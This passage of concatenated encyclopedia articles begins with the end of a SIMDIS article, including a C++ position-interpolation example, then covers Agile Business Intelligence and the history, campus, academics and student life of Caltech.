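        if (upper == samples_.end()) return std::prev(upper)->second;
        auto lower = std::prev(upper);
        double t = (timeSec - lower->first) / (upper->first - lower->first);
        return {lower->second.latitudeDeg  + t * (upper->second.latitudeDeg  - lower->second.latitudeDeg),
                lower->second.longitudeDeg + t * (upper->second.longitudeDeg - lower->second.longitudeDeg),
                lower->second.altitudeM    + t * (upper->second.altitudeM    - lower->second.altitudeM)};
    }

    const std::string& name() const { return name_; }

private:
    std::string name_;
    std::map<double, GeoPosition> samples_;  // ordered by time
};

int main() {
    PlatformTrack aircraft("TestAircraft");
    aircraft.addSample(0.0,  {33.30, -117.35, 3000.0});
    aircraft.addSample(60.0, {33.40, -117.25, 3500.0});

    GeoPosition p = aircraft.positionAt(30.0);  // halfway between the samples
    std::cout << aircraft.name() << " at t=30s: " << p.latitudeDeg << ", "
              << p.longitudeDeg << ", " << p.altitudeM << " m\n";
    return 0;
}

In a live display such samples would arrive over the network in real time, while playback would simply sweep the query time across recorded data.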
Cost
Since SIMDIS requires no additional COTS products or license fees, the Range Commanders Council (RCC) currently lists SIMDIS as a cost savings/avoidance program for the US Department of Defense.
See also
Office of Naval Research (ONR), a sponsor of SIMDIS development
Interactive Scenario Builder
References
External links
SIMDIS Website
SIMDIS SDK
2005 NRL Review Article
2002 NRL Review Article
TEC Army Survey
Defense / Military Virtual Terrain Projects
Agile Business Intelligence
https://en.wikipedia.org/wiki/Agile%20Business%20Intelligence
Agile Business Intelligence (BI) refers to the use of Agile software development for BI projects to reduce the time it takes for traditional BI to show value to the organization, and to help it adapt quickly to changing business needs. Agile BI enables the BI team and managers to make better business decisions, and to do so more quickly.
Agile BI
Agile Business Intelligence (BI) refers to the use of the agile software development methodology for BI projects to reduce the time-to-value of traditional BI and to help in adapting quickly to changing business needs. Agile BI enables the BI team and managers to make better business decisions. The agile methodology works on an iterative principle: it delivers new software features to end users sooner than the traditional waterfall process, which delivers only the final product. With Agile, the requirements and design phases overlap with development, thus shortening development cycles for faster delivery. It promotes adaptive planning, evolutionary development and delivery, and a time-boxed iterative approach, and encourages rapid and flexible response to change. Agile BI encourages business users and IT professionals to think about their data differently, and it is characterized by a low Total Cost of Change (TCC). With agile BI, the focus is not on solving every BI problem at once but rather on delivering pieces of BI functionality in manageable chunks via shorter development cycles and documenting each cycle as it happens. Many companies fail to deliver the right information to the right business managers at the right time.
Definition
Agile BI is a continual process, not a one-time implementation. Managers and leaders need accurate and quick information about the company, and business intelligence provides the data they need. Agile BI enables rapid development using the agile methodology. Agile techniques are a great way to promote the development of BI applications such as dashboards, scorecards, reports and analytic applications.
"Forrester Research defines agile BI as an approach that combines processes, methodologies, tools and technologies, while incorporating organizational structure, in order to help strategic, tactical and operational decision-makers be more flexible and more responsive to ever-changing business and regulatory requirements". According to the research by the Aberdeen Group, organizations with the most highly agile BI implementations are more likely to have processes in place for ensuring that business needs are being met. Success of Agile BI implementation also heavily depends on the end user participation and "frequent collaboration between IT and the business".
Key Performance Criteria
Aberdeen's Maturity Class Framework uses three key performance criteria to distinguish the Best-in-class in the industry:
Availability of timely management information – IT should be able to provide the right, accurate information in a timely manner to business managers so they can make sound business decisions. "This performance metric captures the frequency with which business users receive the information they need in the timeframe they need it".
Average time required to add a column to an existing report – Sometimes new columns need to be added to an existing report to see the required information. "If that information cannot be obtained within the time required to support the decision at hand, the information has no material value. This metric measures the total elapsed time required to modify an existing report by adding a column".
Average time required to create a new dashboard – This metric considers the time required to access any new or updated information and it measures the total elapsed time required to create a new dashboard.
The Agile SDLC
Agile SDLC Iterative Process
Five Steps To Agile BI
Bruni, in her article "5 Steps To Agile BI", outlines five elements that promote an Agile BI enterprise environment.
Agile Development Methodology – “need for an agile, iterative process that speeds the time to market of BI requests by shortening development cycles”.
Agile Project Management Methodology – continuous planning and execution. Planning is done at the beginning of each cycle, rather than once at the beginning of the project as in traditional projects. In an Agile project, the scope can be changed at any time during the development phase.
Agile Infrastructure – the system should have virtualization and horizontal-scaling capability. This gives the flexibility to easily modify the infrastructure and makes it easier to maintain near-real-time BI than with the standard Extract, transform, load (ETL) model.
Cloud & Agile BI – Many organizations are now adopting cloud technology as a cheaper alternative for storing and transferring data. Companies in the initial stages of implementing Agile BI should consider cloud technology, as cloud services can now support BI and ETL software provisioned in the cloud.
IT Organization & Agile BI – To achieve agility and maximum effectiveness, the IT team should interact with the business, address the business problems, and be strong and cohesive.
Twelve Agile Principles
The twelve principles of the Agile Manifesto can be grouped under Process, People, and Other.
Process
1. Our highest priority is to satisfy the customer through early and continuous delivery of valuable software.
2. Welcome changing requirements, even late in development. Agile processes harness change for the customer's competitive advantage.
3. Deliver working software frequently, from a couple of weeks to a couple of months, with a preference to the shorter timescale.
4. Working software is the primary measure of progress.
People
5. Agile processes promote sustainable development. The sponsors, developers, and users should be able to maintain a constant pace indefinitely.
6. Business people and developers must work together daily throughout the project.
7. Build projects around motivated individuals. Give them the environment and support they need, and trust them to get the job done.
Other
8. The most efficient and effective method of conveying information is face-to-face conversation.
9. At regular intervals, the team reflects on how to become more effective, then tunes and adjusts its behavior.
10. Continuous attention to technical excellence and good design enhances agility.
11. Simplicity-the art of maximizing the amount of work not done-is essential.
12. The best architectures, requirements, and designs emerge from self-organizing teams.
BI model and its characteristic goals
Kernochan, in his two-year study of organizations' BI processes, came up with the model below and its characteristic goals:
Data entry — accuracy
Data consolidation — consistency
Data aggregation — scope
Information targeting — fit
Information delivery — timeliness
Information analysis — analyzability
Common Issues
Kernochan's study found these common issues with the current BI processes:
20% of data has errors in it (accuracy)
50% of data is inconsistent (consistency)
It typically takes 7 days to get data to the end user (timeliness)
It isn't possible to do a cross-database query on 70% of company data (scope)
65% of the time, executives don't receive the data they need (fit)
60% of the time, users can't do immediate online analysis of data they receive (analyzability)
75% of new key information sources that surface on the Web are not passed on to users within the year (agility)
The study concluded that adding agility to existing business intelligence will minimize these problems.
Organizations are slowly trying to move their entire processes to agile methodology and development. Agile BI will play a big part in a company's success, as it "emphasizes integration with agile development and innovation".
Improving Business Intelligence Agility
Several factors influence the success of Business Intelligence Agility.
Data Entry
20% of data is inaccurate and about 50% is inconsistent, and these numbers increase with new types of data. Processes need to be re-evaluated and corrected to minimize data entry errors.
Data Consolidation
Often companies have multiple data stores and data is scattered across multiple data stores. "Agility theory emphasizes auto-discovery of each new data source, and automated upgrade of metadata repositories to automatically accommodate the new information".
Data Aggregation
Data aggregation is a process in which information from many data stores is pulled together and displayed in a summary report. Online analytical processing (OLAP) is a simple and commonly used type of data aggregation tool.
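As a minimal sketch of that idea (the record fields, values, and function name below are hypothetical), rows pulled from several data stores can be grouped by one dimension while a measure is summed, which is the kind of summary an OLAP-style report presents:

// Minimal data-aggregation sketch (hypothetical data and field names):
// rows gathered from several stores are grouped by a dimension ("region")
// and a measure ("sales") is summed into a summary report.
#include <iostream>
#include <map>
#include <string>
#include <vector>

struct SalesRecord {
    std::string region;  // dimension to group by
    double sales;        // measure to aggregate
};

// Sum the sales measure per region across all source rows.
std::map<std::string, double> aggregateByRegion(const std::vector<SalesRecord>& rows) {
    std::map<std::string, double> totals;
    for (const auto& row : rows) {
        totals[row.region] += row.sales;
    }
    return totals;
}

int main() {
    // Rows as they might arrive from two different data stores.
    std::vector<SalesRecord> rows = {
        {"North", 1200.0}, {"South", 800.0},   // store A
        {"North", 450.0},  {"South", 300.0}    // store B
    };
    for (const auto& entry : aggregateByRegion(rows)) {
        std::cout << entry.first << ": " << entry.second << '\n';
    }
    return 0;
}

A full OLAP tool performs the same grouping and summing across many dimensions at once and pre-computes the results so that users can slice the summary interactively.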
Information Delivery
One of the key principles of Agile BI is to deliver the right data at the right time to the right individual. Historical data should also be maintained for comparing current performance with the past.
Information Analysis
One of the largest benefits of Agile BI is in improving the decision-making of its users. Real Agile BI should focus on analysis tools that make an operational process or new product development better. The Agile BI approach will save company money, time, and resources that would otherwise be needed to build a traditional data warehouse using the Waterfall methodology.
Agile BI Checklist
A team of developers and business representatives should be assembled to work together
Select either a business stakeholder or a technical liaison to represent the business
Identify and prioritize appropriate user stories or requirements to address during an initial project
Assess various Agile BI delivery tools that can integrate with your existing data warehouse and BI environment
Initiate iterative development process
Advantages of using Agile BI
Agile BI drives its users toward self-service BI. It offers organizations flexibility in terms of delivery, user adoption, and ROI.
Faster to Deliver
Using the Agile methodology, the product is delivered in shorter development cycles with multiple iterations. Each iteration produces working software that can be deployed to production.
Increased User Acceptance
In an Agile development environment, IT and business work together (often in the same room) refining the business needs in each iteration. "This increases user adoption by focusing on the frequently changing needs of the non-technical business user, leading to high end-user engagement, and resulting in higher user adoption rates".
Increased ROI
Organizations can achieve an increased return on investment (ROI) due to shorter development cycles. This minimizes the IT resources and time needed while delivering working, relevant reports to end users.
Agile BI Best Practices
A program charter should be created to set stakeholder expectations on how the Agile BI system will work.
Start with the business information needs to provide context for scope.
Iterations should be time-boxed.
Stress data discovery throughout the requirements and design phases.
Use the Agile process of incremental and iterative development and deployment.
Validate the BI Architecture and get approval on the proof of concept.
Data validation and verification should be completed for each development iteration.
Use flow charts or diagrams to explain the BI process, along with some documentation.
Any change that will be deployed to production should be thoroughly tested in a regression environment.
Have a formal change control process; this will minimize risk, as all changes have to be approved before they go into production.
References
California Institute of Technology
https://en.wikipedia.org/wiki/California%20Institute%20of%20Technology
The California Institute of Technology (Caltech) is a private research university in Pasadena, California, United States of America. The university is known for its strength in science and engineering, and is among a small group of institutes of technology in the United States which is primarily devoted to the instruction of pure and applied sciences. Caltech is ranked among the best academic institutions in the world and is among the most selective in the U.S.
Caltech was founded as a preparatory and vocational school by Amos G. Throop in 1891 and began attracting influential scientists such as George Ellery Hale, Arthur Amos Noyes, and Robert Andrews Millikan in the early 20th century. The vocational and preparatory schools were disbanded and spun off in 1910 and the college assumed its present name in 1920. In 1934, Caltech was elected to the Association of American Universities, and the antecedents of NASA's Jet Propulsion Laboratory, which Caltech continues to manage and operate, were established between 1936 and 1943 under Theodore von Kármán.
Caltech has six academic divisions with strong emphasis on science and engineering, managing $332 million in 2011 in sponsored research. Its primary campus is located northeast of downtown Los Angeles. First-year students are required to live on campus, and 95% of undergraduates remain in the on-campus House System at Caltech. Although Caltech has a strong tradition of practical jokes and pranks, student life is governed by an honor code which allows faculty to assign take-home examinations. The Caltech Beavers compete in 13 intercollegiate sports in the NCAA Division III's Southern California Intercollegiate Athletic Conference (SCIAC).
There are 76 Nobel laureates who have been affiliated with Caltech, including 40 alumni and faculty members (41 prizes, with chemist Linus Pauling being the only individual in history to win two unshared prizes); in addition, 4 Fields Medalists and 6 Turing Award winners have been affiliated with Caltech. There are also 8 Crafoord Laureates, and 56 non-emeritus faculty members (as well as many emeritus faculty members) have been elected to one of the United States National Academies; 4 Chief Scientists of the U.S. Air Force have been affiliated with the institute, and 71 affiliates have won the United States National Medal of Science or Technology. Numerous faculty members are associated with the Howard Hughes Medical Institute as well as NASA. According to a 2015 Pomona College study, Caltech ranked number one in the U.S. for the percentage of its graduates who go on to earn a PhD.
History
Throop College
Caltech started as a vocational school founded in present-day Old Pasadena on Fair Oaks Avenue and Chestnut Street on September 23, 1891, by local businessman and politician Amos G. Throop. The school was known successively as Throop University, Throop Polytechnic Institute (and Manual Training School) and Throop College of Technology before acquiring its current name in 1920. The vocational school was disbanded and the preparatory program was split off to form the independent Polytechnic School in 1907.
At a time when scientific research in the United States was still in its infancy, George Ellery Hale, a solar astronomer from the University of Chicago, founded the Mount Wilson Observatory in 1904. He joined Throop's board of trustees in 1907, and soon began developing it and the whole of Pasadena into a major scientific and cultural destination. He engineered the appointment of James A. B. Scherer, a literary scholar untutored in science but a capable administrator and fund-raiser, to Throop's presidency in 1908. Scherer persuaded retired businessman and trustee Charles W. Gates to donate $25,000 in seed money to build Gates Laboratory, the first science building on campus.
World Wars
In 1910, Throop moved to its current site. Arthur Fleming donated the land for the permanent campus site. Theodore Roosevelt delivered an address at Throop Institute on March 21, 1911, and he declared:
I want to see institutions like Throop turn out perhaps ninety-nine of every hundred students as men who are to do given pieces of industrial work better than any one else can do them; I want to see those men do the kind of work that is now being done on the Panama Canal and on the great irrigation projects in the interior of this country—and the one-hundredth man I want to see with the kind of cultural scientific training that will make him and his fellows the matrix out of which you can occasionally develop a man like your great astronomer, George Ellery Hale.
In the same year, a bill was introduced in the California Legislature calling for the establishment of a publicly funded "California Institute of Technology", with an initial budget of a million dollars, ten times the budget of Throop at the time. The board of trustees offered to turn Throop over to the state, but the presidents of Stanford University and the University of California successfully lobbied to defeat the bill, which allowed Throop to develop as the only scientific research-oriented education institute in southern California, public or private, until the onset of World War II necessitated the broader development of research-based science education. The promise of Throop attracted physical chemist Arthur Amos Noyes from MIT to develop the institution and assist in establishing it as a center for science and technology.
With the onset of World War I, Hale organized the National Research Council to coordinate and support scientific work on military problems. While he supported the idea of federal appropriations for science, he took exception to a federal bill that would have funded engineering research at land-grant colleges, and instead sought to raise a $1 million national research fund entirely from private sources. To that end, as Hale wrote in The New York Times:
Throop College of Technology, in Pasadena, California, has recently afforded a striking illustration of one way in which the Research Council can secure co-operation and advance scientific investigation. This institution, with its able investigators and excellent research laboratories, could be of great service in any broad scheme of cooperation. President Scherer, hearing of the formation of the council, immediately offered to take part in its work, and with this object, he secured within three days an additional research endowment of one hundred thousand dollars.
Through the National Research Council, Hale simultaneously lobbied for science to play a larger role in national affairs, and for Throop to play a national role in science. The new funds were designated for physics research, and ultimately led to the establishment of the Norman Bridge Laboratory, which attracted experimental physicist Robert Andrews Millikan from the University of Chicago in 1917. During the course of the war, Hale, Noyes and Millikan worked together in Washington on the NRC. Subsequently, they continued their partnership in developing Caltech.
Under the leadership of Hale, Noyes, and Millikan (aided by the booming economy of Southern California), Caltech grew to national prominence in the 1920s and concentrated on the development of Roosevelt's "Hundredth Man". On November 29, 1921, the trustees declared it to be the express policy of the institute to pursue scientific research of the greatest importance and at the same time "to continue to conduct thorough courses in engineering and pure science, basing the work of these courses on exceptionally strong instruction in the fundamental sciences of mathematics, physics, and chemistry; broadening and enriching the curriculum by a liberal amount of instruction in such subjects as English, history, and economics; and vitalizing all the work of the Institute by the infusion in generous measure of the spirit of research". In 1923, Millikan was awarded the Nobel Prize in Physics. In 1925, the school established a department of geology and hired William Bennett Munro, then chairman of the division of History, Government, and Economics at Harvard University, to create a division of humanities and social sciences at Caltech. In 1928, a division of biology was established under the leadership of Thomas Hunt Morgan, the most distinguished biologist in the United States at the time, and discoverer of the role of genes and the chromosome in heredity. In 1930, Kerckhoff Marine Laboratory was established in Corona del Mar under the care of Professor George MacGinitie. In 1926, a graduate school of aeronautics was created, which eventually attracted Theodore von Kármán. Kármán later helped create the Jet Propulsion Laboratory, and played an integral part in establishing Caltech as one of the world's centers for rocket science. In 1928, construction of the Palomar Observatory began.
Millikan served as "Chairman of the Executive Council" (effectively Caltech's president) from 1921 to 1945, and his influence was such that the institute was occasionally referred to as "Millikan's School." Millikan initiated a visiting-scholars program soon after joining Caltech. Notable scientists who accepted his invitation include Paul Dirac, Erwin Schrödinger, Werner Heisenberg, Hendrik Lorentz and Niels Bohr. Albert Einstein arrived on the Caltech campus for the first time in 1931 to polish up his Theory of General Relativity, and he returned to Caltech subsequently as a visiting professor in 1932 and 1933.
During World War II, Caltech was one of 131 colleges and universities nationally that took part in the V-12 Navy College Training Program which offered students a path to a Navy commission. The United States Navy also maintained a naval training school for aeronautical engineering, resident inspectors of ordnance and naval material, and a liaison officer to the National Defense Research Committee on campus.
Project Vista
From April to December 1951, Caltech was the host of a federal classified study, Project Vista. The selection of Caltech as host for the project was based on the university's expertise in rocketry and nuclear physics. In response to the war in Korea and pressure from the Soviet Union, the project was Caltech's way of assisting the federal government in its effort to increase national security. The project was created to study new ways of improving the relationship between tactical air support and ground troops. The Army, Air Force, and Navy sponsored the project; however, it was under contract with the Army. The study was named after the Vista del Arroyo Hotel, which housed it. The study operated under a committee with the supervision of President Lee A. DuBridge. William A. Fowler, a professor at Caltech, was selected as research director. More than a fourth of Caltech's faculty and a group of outside scientists staffed the project, and the number was larger still counting visiting scientists, military liaisons, and secretarial and security staff. In compensation for its participation, the university received about $750,000.
Post-war growth
From the 1950s to 1980s, Caltech was the home of Murray Gell-Mann and Richard Feynman, whose work was central to the establishment of the Standard Model of particle physics. Feynman was also widely known outside the physics community as an exceptional teacher and a colorful, unconventional character.
During Lee A. DuBridge's tenure as Caltech's president (1946–1969), Caltech's faculty doubled and the campus tripled in size. DuBridge, unlike his predecessors, welcomed federal funding of science. New research fields flourished, including chemical biology, planetary science, nuclear astrophysics, and geochemistry. A 200-inch telescope was dedicated on nearby Palomar Mountain in 1948 and remained the world's most powerful optical telescope for over forty years.
Caltech opened its doors to female undergraduates during the presidency of Harold Brown in 1970, and they made up 14% of the entering class. The portion of female undergraduates has been increasing since then.
Protests by Caltech students are rare. The earliest was a 1968 protest outside the NBC Burbank studios, in response to rumors that NBC was to cancel Star Trek. In 1973, the students from Dabney House protested a presidential visit with a sign on the library bearing the simple phrase "Impeach Nixon". The following week, Ross McCollum, president of the National Oil Company, wrote an open letter to Dabney House stating that in light of their actions he had decided not to donate one million dollars to Caltech. The Dabney family, being Republicans, disowned Dabney House after hearing of the protest.
21st century
Since 2000, the Einstein Papers Project has been located at Caltech. The project was established in 1986 to assemble, preserve, translate, and publish papers selected from the literary estate of Albert Einstein and from other collections.
In fall 2008, the freshman class was 42% female, a record for Caltech's undergraduate enrollment. In the same year, the Institute concluded a six-year-long fund-raising campaign. The campaign raised more than $1.4 billion from about 16,000 donors. Nearly half of the funds went into the support of Caltech programs and projects.
In 2010, Caltech, in partnership with Lawrence Berkeley National Laboratory and headed by Professor Nathan Lewis, established a DOE Energy Innovation Hub aimed at developing revolutionary methods to generate fuels directly from sunlight. This hub, the Joint Center for Artificial Photosynthesis, will receive up to $122 million in federal funding over five years.
In 2012, Caltech began to offer classes through massive open online courses (MOOCs) on Coursera, and from 2013 also on edX.
Jean-Lou Chameau, the eighth president, announced on February 19, 2013, that he would be stepping down to accept the presidency at King Abdullah University of Science and Technology. Thomas F. Rosenbaum was announced to be the ninth president of Caltech on October 24, 2013, and his term began on July 1, 2014.
In 2019, Caltech received a gift of $750 million for sustainability research from the Resnick family of The Wonderful Company. The gift is the largest ever for environmental sustainability research and the second-largest private donation to a US academic institution (after Bloomberg's gift of $1.8 billion to Johns Hopkins University in 2018).
On account of President Robert A. Millikan's affiliation with the Human Betterment Foundation, in January 2021, the Caltech Board of Trustees authorized the removal of Millikan's name (and the names of five other historical figures affiliated with the Foundation), from campus buildings.
Campus
Caltech's primary campus is located in Pasadena, California, northeast of downtown Los Angeles. It is within walking distance of Old Town Pasadena and the Pasadena Playhouse District, and the two locations are therefore frequent getaways for Caltech students.
In 1917 Hale hired architect Bertram Goodhue to produce a master plan for the campus. Goodhue conceived the overall layout of the campus and designed the physics building, Dabney Hall, and several other structures, in which he sought to be consistent with the local climate, the character of the school, and Hale's educational philosophy. Goodhue's designs for Caltech were also influenced by the traditional Spanish mission architecture of Southern California.
During the 1960s, Caltech underwent considerable expansion, in part due to the philanthropy of alumnus Arnold O. Beckman. In 1953, Beckman was asked to join the Caltech Board of Trustees. In 1964, he became its chairman. Over the next few years, as Caltech's president emeritus David Baltimore describes it, Arnold Beckman and his wife Mabel "shaped the destiny of Caltech".
In 1971 a magnitude-6.6 earthquake in San Fernando caused some damage to the Caltech campus. Engineers who evaluated the damage found that two historic buildings dating from the early days of the Institute—Throop Hall and the Goodhue-designed Culbertson Auditorium—had cracked.
Newer additions to the campus include the Cahill Center for Astronomy and Astrophysics and the Walter and Leonore Annenberg Center for Information Science and Technology, which opened in 2009; the Warren and Katherine Schlinger Laboratory for Chemistry and Chemical Engineering followed in March 2010. The institute also completed an upgrade of the South Houses in 2006. In late 2010, Caltech completed a 1.3 MW solar array projected to produce approximately 1.6 GWh in 2011.
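As a rough, back-of-the-envelope check (assuming the 1.3 MW figure is the array's nameplate rating and using 8,760 hours in a year), the projected output corresponds to a capacity factor of about 14 percent:

\[
\frac{1.6\ \text{GWh}}{1.3\ \text{MW} \times 8760\ \text{h}} \approx \frac{1.6\ \text{GWh}}{11.4\ \text{GWh}} \approx 0.14
\]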
Organization and administration
Caltech is incorporated as a non-profit corporation and is governed by a privately appointed 46-member board of trustees who serve five-year terms of office and retire at the age of 72. The trustees elect a president to serve as the chief executive officer of the institute and administer the affairs of the institute on behalf of the board, a provost who serves as the chief academic officer of the institute below the president, and ten other vice-presidential and senior positions. Thomas F. Rosenbaum became the ninth president of Caltech in 2014. Caltech's endowment is governed by a permanent trustee committee and administered by an investment office.
The institute is organized into six primary academic divisions: Biology and Biological Engineering; Chemistry and Chemical Engineering; Engineering and Applied Science; Geological and Planetary Sciences; Humanities and Social Sciences; and Physics, Mathematics and Astronomy. The voting faculty of Caltech include all professors, instructors, research associates and fellows, and the University Librarian. Faculty are responsible for establishing admission requirements, academic standards, and curricula. The Faculty Board is the faculty's representative body and consists of 18 elected faculty representatives as well as other senior administration officials. Full-time professors are expected to teach classes, conduct research, advise students, and perform administrative work such as serving on committees.
Founded in the 1930s, the Jet Propulsion Laboratory (JPL) is a federally funded research and development center (FFRDC) owned by NASA and operated as a division of Caltech through a contract between NASA and Caltech. In 2008, JPL spent over $1.6 billion on research and development and employed over 5,000 project-related and support employees. The JPL Director also serves as a Caltech Vice President and is responsible to the President of the Institute for the management of the laboratory.
Academics
Caltech is a small four-year, highly residential research university with slightly more students in graduate programs than undergraduate. The institute has been accredited by the Western Association of Schools and Colleges since 1949. Caltech is on the quarter system: the fall term starts in late September and ends before Christmas, the second term starts after New Year's Day and ends in mid-March, and the third term starts in late March or early April and ends in early June.
Rankings
For 2020, U.S. News & World Report ranked Caltech as tied for 12th in the United States among national universities overall, 8th for most innovative, and 11th for best value. U.S. News & World Report also ranked the graduate programs in chemistry and earth sciences first among national universities.
Caltech was ranked 1st internationally between 2011 and 2016 by the Times Higher Education World University Rankings. Caltech was ranked as the best university in the world in two categories: Engineering & Technology and Physical Sciences. It was also found to have the highest faculty citation rate in the world.
Admissions
For the Class of 2023 (enrolled Fall 2019), Caltech received 8,367 applications and accepted 6.4% of applicants; 235 enrolled. The class included 44% women and 56% men. 32% were of underrepresented ancestry (which includes students who self-identify as American Indian/Alaska Native, Hispanic/Latino, Black/African American, and/or Native Hawaiian/Pacific Islander), and 6% were foreign students.
Admission to Caltech is extremely rigorous, and admitted students have historically posted among the highest test scores in the nation. The middle 50% range of SAT scores for enrolled freshmen for the class of 2023 was 740–780 for evidence-based reading and writing, 790–800 for math, and 1530–1570 total. The middle 50% range ACT Composite score was 35–36. The middle 50% ranges for the SAT Subject Tests were 800–800 for Math Level 2, 760–800 for Physics, 760–800 for Chemistry, and 760–800 for Biology. In June 2020, Caltech announced a test-blind policy under which it would neither require nor consider test scores for the next two years; in July 2021, the moratorium was extended by another year.
Tuition and financial aid
Undergraduate tuition for the 2021–2022 school year was $56,394 and total annual costs were estimated to be $79,947, excluding the Caltech Student Health Insurance Plan. In 2012–2013, Caltech awarded $17.1 million in need-based aid, $438,000 in non-need-based aid, and $2.51 million in self-help support to enrolled undergraduate students. The average financial aid package of all students eligible for aid was $38,756 and students graduated with an average debt of $15,090.
Undergraduate program
The full-time, four-year undergraduate program emphasizes instruction in the arts and sciences and has high graduate coexistence. Caltech offers 28 majors (called "options") and 12 minors across all six academic divisions. Caltech also offers interdisciplinary programs in Applied Physics, Biochemistry, Bioengineering, Computation and Neural Systems, Control and Dynamical Systems, Environmental Science and Engineering, Geobiology and Astrobiology, Geochemistry, and Planetary Astronomy. The most popular options are Chemical Engineering, Computer Science, Electrical Engineering, Mechanical Engineering and Physics.
Prior to the entering class of 2013, Caltech required students to take a core curriculum of five terms of mathematics, five terms of physics, two terms of chemistry, one term of biology, two terms of lab courses, one term of scientific communication, three terms of physical education, and 12 terms of humanities and social science. Since 2013, only three terms each of mathematics and physics have been required by the institute, with the remaining two terms each required by certain options.
A typical class is worth 9 academic units, and given the extensive core curriculum requirements in addition to individual options' degree requirements, students need to take an average of 40.5 units per term (more than four classes) in order to graduate in four years. 36 units is the minimum full-time load, 48 units is considered a heavy load, and registrations above 51 units require an overload petition. Approximately 20 percent of students double-major. This is achievable because the humanities and social sciences majors have been designed to be completed in conjunction with a science major. Although choosing two options in the same division is discouraged, it is still possible.
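As a quick check of the arithmetic (assuming twelve quarters over four years, three per academic year, which is not stated explicitly above), the 40.5-unit average implies a total graduation requirement of roughly 486 units:

\[
40.5\ \text{units/term} \times 3\ \text{terms/year} \times 4\ \text{years} = 486\ \text{units}
\]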
First-year students are enrolled in first-term classes based upon results of placement exams in math, physics, chemistry, and writing and take all classes in their first two terms on a Pass/Fail basis. There is little competition; collaboration on homework is encouraged and the honor system encourages take-home tests and flexible homework schedules. Caltech offers co-operative programs with other schools, such as the Pasadena Art Center College of Design and Occidental College.
According to a PayScale study, Caltech graduates earn a median early career salary of $83,400 and $143,100 mid-career, placing them in the top 5 among graduates of US colleges and universities. The average net return on investment over a period of 20 years is $887,000, the tenth-highest among US colleges.
Caltech offers Army and Air Force ROTC in cooperation with the University of Southern California.
Graduate program
The graduate instructional programs emphasize doctoral studies and are dominated by science, technology, engineering, and mathematics fields. The institute offers graduate degree programs for the Master of Science, Engineer's Degree, Doctor of Philosophy, BS/MS, and MD/PhD, with the majority of students in the PhD program. The most popular options are Chemistry, Physics, Biology, Electrical Engineering, and Chemical Engineering. Applicants for graduate studies are required to take the GRE. GRE Subject scores are either required or strongly recommended by several options. A joint program among Caltech, the Keck School of Medicine of the University of Southern California, and the David Geffen School of Medicine at UCLA grants MD/PhD degrees. Students in this program do their preclinical and clinical work at USC or UCLA, and their PhD work with any member of the Caltech faculty, including the Biology, Chemistry, and Engineering and Applied Sciences Divisions. The MD degree is awarded by USC or UCLA and the PhD by Caltech.
The research facilities at Caltech are available to graduate students, but there are also opportunities for students to work in facilities of other universities and research centers, as well as in private industry. The graduate student to faculty ratio is 4:1.
Approximately 99 percent of doctoral students have full financial support. Financial support for graduate students comes in the form of fellowships, research assistantships, teaching assistantships or a combination of fellowship and assistantship support.
Graduate students are bound by the honor code, as are the undergraduates, and the Graduate Honor Council oversees any violations of the code.
Research
Caltech is classified among "R1: Doctoral Universities – Very High Research Activity". Caltech was elected to the Association of American Universities in 1934 and remains a research university with "very high" research activity, primarily in STEM fields. Caltech manages research expenditures of $270 million annually, 66th among all universities in the U.S. and 17th among private institutions without medical schools for 2008. The largest federal agencies contributing to research are NASA, National Science Foundation, Department of Health and Human Services, Department of Defense, and Department of Energy. Caltech received $144 million in federal funding for the physical sciences, $40.8 million for the life sciences, $33.5 million for engineering, $14.4 million for environmental sciences, $7.16 million for computer sciences, and $1.97 million for mathematical sciences in 2008.
The institute was awarded an all-time high funding of $357 million in 2009. Active funding from the National Science Foundation Directorate for Mathematical and Physical Sciences (MPS) for Caltech stands at $343 million, the highest for any educational institution in the nation, and higher than the total funds allocated to any state except California and New York.
In addition to managing JPL, Caltech also operates the Palomar Observatory in San Diego County, the Owens Valley Radio Observatory in Bishop, California, the Caltech Submillimeter Observatory and W. M. Keck Observatory at the Mauna Kea Observatories, the Laser Interferometer Gravitational-Wave Observatory (LIGO) in Livingston, Louisiana, and Richland, Washington, and the Kerckhoff Marine Laboratory in Corona del Mar, California. The Institute launched the Kavli Nanoscience Institute at Caltech in 2006, the Keck Institute for Space Studies in 2008, and is also the current home for the Einstein Papers Project. The Spitzer Science Center (SSC), part of the Infrared Processing and Analysis Center located on the Caltech campus, is the data analysis and community support center for NASA's Spitzer Space Telescope.
Caltech partnered with UCLA to establish a Joint Center for Translational Medicine (UCLA-Caltech JCTM), which conducts experimental research into clinical applications, including the diagnosis and treatment of diseases such as cancer.
Caltech operates several TCCON stations as part of an international collaborative effort of measuring greenhouse gases globally. One station is on campus.
Undergraduates at Caltech are also encouraged to participate in research. About 80% of the class of 2010 did research through the annual Summer Undergraduate Research Fellowships (SURF) program at least once during their stay, and many continued during the school year. Students write and submit SURF proposals for research projects in collaboration with professors, and about 70 percent of applicants are awarded SURFs. The program is open to both Caltech and non-Caltech undergraduate students. It serves as preparation for graduate school and helps to explain why Caltech has the highest percentage of alumni who go on to receive a PhD of all the major universities.
The licensing and transferring of technology to the commercial sector is managed by the Office of Technology Transfer (OTT). OTT protects and manages the intellectual property developed by faculty members, students, other researchers, and JPL technologists. Caltech receives more invention disclosures per faculty member than any other university in the nation. Since 1969, 1,891 patents have been granted to Caltech researchers.
Student life
House system
During the early 20th century, a Caltech committee visited several universities and decided to transform the undergraduate housing system from fraternities to a house system. Four South Houses (or Hovses, as styled in the stone engravings) were built: Blacker House, Dabney House, Fleming House and Ricketts House. In the 1960s, three North Houses were built: Lloyd House, Page House, and Ruddock House, and during the 1990s, Avery House. The four South Houses closed for renovation in 2005 and reopened in 2006. The latest addition to residential life at Caltech is Bechtel Residence, which opened in 2018. It is not affiliated with the house system. All first- and second-year students live on campus in the house system or in the Bechtel Residence.
On account of Albert B. Ruddock's affiliation with the Human Betterment Foundation, in January 2021, the Caltech Board of Trustees authorized the removal of Ruddock's name from campus buildings. Ruddock House was renamed as the Grant D. Venerable House.
Athletics
Caltech has athletic teams in baseball, men's and women's basketball, cross country, men's and women's soccer, swimming and diving, men's and women's tennis, track and field, women's volleyball, and men's and women's water polo. Caltech's mascot is the Beaver, a homage to nature's engineer. Its teams are members of the NCAA Division III and compete in the Southern California Intercollegiate Athletic Conference (SCIAC), which Caltech co-founded in 1915.
On January 6, 2007, the Beavers' men's basketball team snapped a 207-game losing streak to Division III schools, beating Bard College 81–52. It was their first Division III victory since 1996.
